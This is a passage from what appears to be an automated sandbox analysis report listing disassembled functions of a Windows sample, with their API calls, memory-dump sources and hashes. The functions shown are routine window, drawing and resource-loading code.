                                                                              • SendMessageA.USER32(00000000,0000040D,00000000,00000000), ref: 00EC81A3
                                                                              • SendMessageA.USER32(?,0000040E,-00000001,00000030), ref: 00EC81EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$H_prolog3_
                                                                              • String ID: 0
                                                                              • API String ID: 3491702567-4108050209
                                                                              • Opcode ID: 0503322e06cfcc41ee54012de32e5210503ef4dd80148248f620eb3c413ea55e
                                                                              • Instruction ID: 96ecaf8706753e24147cbe43a551003e57bacc2957ec50c6ee1fdbcdfbe48ff4
                                                                              • Opcode Fuzzy Hash: 0503322e06cfcc41ee54012de32e5210503ef4dd80148248f620eb3c413ea55e
                                                                              • Instruction Fuzzy Hash: 6741C371A00919AFDB29DB60CE85FEAB7B8BF04349F000299E55DB3190DB316E86DF50
                                                                              Function 00EA800D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00EA4DCE: LoadLibraryW.KERNEL32(00000000,01048428,00000010,00E9F7D8,?), ref: 00EA4E08
                                                                              • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00EA804C
                                                                              • FreeLibrary.KERNEL32(00000000,?,comctl32.dll), ref: 00EA8098
                                                                                • Part of subcall function 00EA7FFA: GetLastError.KERNEL32(?,00000000), ref: 00EA7FFA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressErrorFreeLastLoadProc
                                                                              • String ID: DllGetVersion$comctl32.dll
                                                                              • API String ID: 2540614322-3857068685
                                                                              • Opcode ID: c655ce68e9a20c8600b0acfb897461963623411c81213c8ab29b424f897966b1
                                                                              • Instruction ID: 495afdb025034efd01cea604e22e17aabf78a8c59fb27be3ece4a38ca836b28f
                                                                              • Opcode Fuzzy Hash: c655ce68e9a20c8600b0acfb897461963623411c81213c8ab29b424f897966b1
                                                                              • Instruction Fuzzy Hash: 0511AB75A002199FDB12DF65C885B9EBBF4BF8A714F114019E601BF340DF79A904CB65
                                                                              Function 00EA819C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00EA81B7
                                                                              • GetClassNameA.USER32(?,?,0000000A), ref: 00EA81CC
                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00EA81E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCompareLongNameStringWindow
                                                                              • String ID: combobox
                                                                              • API String ID: 1414938635-2240613097
                                                                              • Opcode ID: 235c5d0e5a59cbc5b183690806be1f418b7fc8431d4b1b58ce4fde5a5f9b4b86
                                                                              • Instruction ID: 94591e00bb30c754d0bba5e948e377a3c3f064427d1b075d2b3e39b34a6770ca
                                                                              • Opcode Fuzzy Hash: 235c5d0e5a59cbc5b183690806be1f418b7fc8431d4b1b58ce4fde5a5f9b4b86
                                                                              • Instruction Fuzzy Hash: 25F0F431615119AFCB12DB68CD02EBF73A8FB1A720F104315F421FA1C0DA64AD018798
                                                                              Function 00F1E201 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetRectEmpty.USER32(00000000), ref: 00F1E20C
                                                                              • GetClientRect.USER32(00000000,00000000), ref: 00F1E22C
                                                                              • GetParent.USER32(00000000), ref: 00F1E24B
                                                                              • OffsetRect.USER32(00000000,00000000,00000000), ref: 00F1E2CD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$ClientEmptyOffsetParent
                                                                              • String ID:
                                                                              • API String ID: 3819956977-0
                                                                              • Opcode ID: fe3718d7d9e7d57b02ef307cf3be3e781cf0f6c4e49863ec8b4165c9a4c2be1e
                                                                              • Instruction ID: 2a25098f4adf95f0dbe48740cdeee0e74c704007ba69039f91ff6ea1f96d70ad
                                                                              • Opcode Fuzzy Hash: fe3718d7d9e7d57b02ef307cf3be3e781cf0f6c4e49863ec8b4165c9a4c2be1e
                                                                              • Instruction Fuzzy Hash: 6131C671600612EFD719DF65C895E66B7E9FF88720B04812DF8198F641EB30EC40CBA0
                                                                              Function 00F5C14E Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00F5C1C2
                                                                              • EqualRect.USER32(?,?), ref: 00F5C1ED
                                                                              • BeginDeferWindowPos.USER32(00000000), ref: 00F5C1FA
                                                                              • EndDeferWindowPos.USER32(00000000), ref: 00F5C220
                                                                                • Part of subcall function 00EEF427: GetWindowRect.USER32(00000000,?), ref: 00EEF43B
                                                                                • Part of subcall function 00EEF427: GetParent.USER32(00000000), ref: 00EEF491
                                                                                • Part of subcall function 00EEF427: GetParent.USER32(00000000), ref: 00EEF4A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$DeferParent$BeginEqual
                                                                              • String ID:
                                                                              • API String ID: 2054780619-0
                                                                              • Opcode ID: e4c856d544ed20edf92a49aa132c4856ac165426a9bfc282bd49b6e721b71a6e
                                                                              • Instruction ID: 601bcfccce51ae9863c7ea526345c786b19601a1d24ed52c0aadf7fcb5324fcb
                                                                              • Opcode Fuzzy Hash: e4c856d544ed20edf92a49aa132c4856ac165426a9bfc282bd49b6e721b71a6e
                                                                              • Instruction Fuzzy Hash: 383118B1E00219EFCF11DFA5D9849EEBBF9BF08711F10012AE906A7201D775AA04DBE1
                                                                              Function 00E94343 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00E9437F
                                                                              • GetClientRect.USER32(?,?), ref: 00E94392
                                                                              • GetParent.USER32(?), ref: 00E9439B
                                                                              • MapWindowPoints.USER32(?,?,?,00000002), ref: 00E943B3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Parent$ClientPointsRectWindow
                                                                              • String ID:
                                                                              • API String ID: 1847894547-0
                                                                              • Opcode ID: dff3b12682876040d309f6edd187fc26b6306e4be4c9354caf88b532569bc32b
                                                                              • Instruction ID: 56d1d121ec653beaaef1f37d55efcb8de9ab7bf0b3b77d9e730467354df50d8c
                                                                              • Opcode Fuzzy Hash: dff3b12682876040d309f6edd187fc26b6306e4be4c9354caf88b532569bc32b
                                                                              • Instruction Fuzzy Hash: F0216271A00619EFCF16EFA4D8459AFBBB5FF0D300B00446DF946AB251DB75AA00DB91
                                                                              Function 00E8E2AE Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00E8E2B5
                                                                              • IsRectEmpty.USER32(?), ref: 00E8E2D7
                                                                                • Part of subcall function 00ED09AD: __EH_prolog3.LIBCMT ref: 00ED09B4
                                                                                • Part of subcall function 00ED09AD: CreateCompatibleDC.GDI32(00000000), ref: 00ED0A17
                                                                                • Part of subcall function 00ED09AD: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00ED0A4A
                                                                                • Part of subcall function 00ED09AD: SelectObject.GDI32(?,00000000), ref: 00ED0A9E
                                                                              • IsRectEmpty.USER32(?), ref: 00E8E31B
                                                                              • FillRect.USER32(?,?,-000000A0), ref: 00E8E33C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$CompatibleCreateEmptyH_prolog3$BitmapFillObjectSelect
                                                                              • String ID:
                                                                              • API String ID: 1042983850-0
                                                                              • Opcode ID: 2983c230edddfb3801bd8684465b07fc6e911b4058d09378db85a991da60aaa6
                                                                              • Instruction ID: 37a2a2c61e278956892f80c74b81e14818b9ae5d616465da6658e24e4e5f31f7
                                                                              • Opcode Fuzzy Hash: 2983c230edddfb3801bd8684465b07fc6e911b4058d09378db85a991da60aaa6
                                                                              • Instruction Fuzzy Hash: DD113A7240010AAFDF11FFA0CD46EEE37A8BF04314F1A5129B859B71A2DB39D904DB12
                                                                              Function 00EA02C5 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00EA02CF
                                                                              • GetTopWindow.USER32(00000000), ref: 00EA02DC
                                                                                • Part of subcall function 00EA02C5: GetWindow.USER32(00000000,00000002), ref: 00EA032B
                                                                              • GetTopWindow.USER32(?), ref: 00EA0310
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item
                                                                              • String ID:
                                                                              • API String ID: 369458955-0
                                                                              • Opcode ID: 85defd1b8151f18c5342566b26fa7d721c1e861387af6d46c10f067bd2eb4a00
                                                                              • Instruction ID: 53408a9e08b967edf6067c150a0209cfd75b603e2921701457dddff92c0fc0e3
                                                                              • Opcode Fuzzy Hash: 85defd1b8151f18c5342566b26fa7d721c1e861387af6d46c10f067bd2eb4a00
                                                                              • Instruction Fuzzy Hash: A201EC31401629EBCF332F619C48BAE3B99BF1E795F005014FD54BD025D736E92496A5
                                                                              Function 00EA01A3 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00EA01C7
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,00E96293,?,?,00E83252,8C3A2C7B), ref: 00EA01D3
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00E96293,?,?,00E83252,8C3A2C7B), ref: 00EA01E0
                                                                              • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,00E96293,?,?,00E83252,8C3A2C7B), ref: 00EA01FC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeLoadLock
                                                                              • String ID:
                                                                              • API String ID: 1078018258-0
                                                                              • Opcode ID: 35478023bcf5410239dcf8b072add31231a4da3596c1f9545cb029c06b0b0d8a
                                                                              • Instruction ID: 3021f38e2831e53b7c42805b2f795e316a088b4cf8d24f703c5380887a018f30
                                                                              • Opcode Fuzzy Hash: 35478023bcf5410239dcf8b072add31231a4da3596c1f9545cb029c06b0b0d8a
                                                                              • Instruction Fuzzy Hash: 2BF0A4366017107F83235B559C48D6EB76CEF89764B055025F905BF306CE35EE0087B0
                                                                              Function 00F0E398 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0E4CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: InflateRect
                                                                              • String ID: nI$nI
                                                                              • API String ID: 2073123975-2288121737
                                                                              • Opcode ID: 705b4cddce4073cc95b776438e22dcab5487cc6a8d54deeaacb77171e003023a
                                                                              • Instruction ID: 31be59845af079a2fba53e5433ef3e3aa58f394bd1724e05fdbb8789fba565e0
                                                                              • Opcode Fuzzy Hash: 705b4cddce4073cc95b776438e22dcab5487cc6a8d54deeaacb77171e003023a
                                                                              • Instruction Fuzzy Hash: 8E41C43DE002199BCF25CF54D9809AEB7A5FF48760F184569EC01972C4DB34DD40EB90
                                                                              Function 00F0E04E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FillRect.USER32(?,?,00000000), ref: 00F0E0BF
                                                                              • FillRect.USER32(?,?,00000000), ref: 00F0E11D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: FillRect
                                                                              • String ID: F
                                                                              • API String ID: 2175405051-2701363647
                                                                              • Opcode ID: f919a395e5d5e9b38ddccfdf1e75d0b8110ab5963ac2c3f054b85f4aafe3553f
                                                                              • Instruction ID: bc56ff1ec5a49c57f9816ffc13e18490a2149f588b358f7af9867331f9936f05
                                                                              • Opcode Fuzzy Hash: f919a395e5d5e9b38ddccfdf1e75d0b8110ab5963ac2c3f054b85f4aafe3553f
                                                                              • Instruction Fuzzy Hash: FC21D636600114DFCB06DF54C944A99BBA9FF48310F094461FD09AB241C771EE01FBA1
                                                                              Function 00E8C047 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00E8C04E
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8C06F
                                                                                • Part of subcall function 00E99907: __EH_prolog3.LIBCMT ref: 00E9990E
                                                                                • Part of subcall function 00E99907: CreatePen.GDI32(?,?,?), ref: 00E9992F
                                                                                • Part of subcall function 00E9A9C4: SelectObject.GDI32(?,00000000), ref: 00E9A9E8
                                                                                • Part of subcall function 00E9A9C4: SelectObject.GDI32(?,00000000), ref: 00E9AA00
                                                                                • Part of subcall function 00E9A660: MoveToEx.GDI32(00000000,?,?,?), ref: 00E9A683
                                                                                • Part of subcall function 00E9A660: MoveToEx.GDI32(?,?,?,?), ref: 00E9A698
                                                                                • Part of subcall function 00E9A62B: MoveToEx.GDI32(?,?,?,00000000), ref: 00E9A646
                                                                                • Part of subcall function 00E9A62B: LineTo.GDI32(00000001,?,?), ref: 00E9A655
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Move$H_prolog3ObjectSelect$CreateInflateLineRect
                                                                              • String ID: B
                                                                              • API String ID: 2702496521-2833499926
                                                                              • Opcode ID: 31fd6cbef22aa4efe658c4a1ecef29c0f556067a5b3007222a2dfdb130c67c2c
                                                                              • Instruction ID: 20d91da56f6910c55b1e2eb948cb15131d7f87891848831b61adcd00663040b3
                                                                              • Opcode Fuzzy Hash: 31fd6cbef22aa4efe658c4a1ecef29c0f556067a5b3007222a2dfdb130c67c2c
                                                                              • Instruction Fuzzy Hash: BE211B75A0010EAFCF10EF64CC45EDE77FABF48314F055129B919B7292DA3899188BA1
                                                                              Function 00F0C276 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00F0C27D
                                                                              • InflateRect.USER32(?,00000001,00000001), ref: 00F0C2E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3InflateRect
                                                                              • String ID: B
                                                                              • API String ID: 2848689861-2833499926
                                                                              • Opcode ID: a52bd2ecd4b324e87da4992aaa5c13ee4c59d8e43545e347ee1703f6d167c997
                                                                              • Instruction ID: 879077d84ab4e4a3c2f58ecf6855b556db5414434f44417396c16a18fe8984bb
                                                                              • Opcode Fuzzy Hash: a52bd2ecd4b324e87da4992aaa5c13ee4c59d8e43545e347ee1703f6d167c997
                                                                              • Instruction Fuzzy Hash: 0B118172A006159BDF11FB90C846FBE77A5AF84710F0A1514BA05BB2D2CB689C40E7D2
                                                                              Function 00F5438B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00F54392
                                                                              • RegisterWindowMessageA.USER32(00000010,00000004,00F54100,00000000,00000000,0000005C,00EBE5A7,?,00000550), ref: 00F543DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
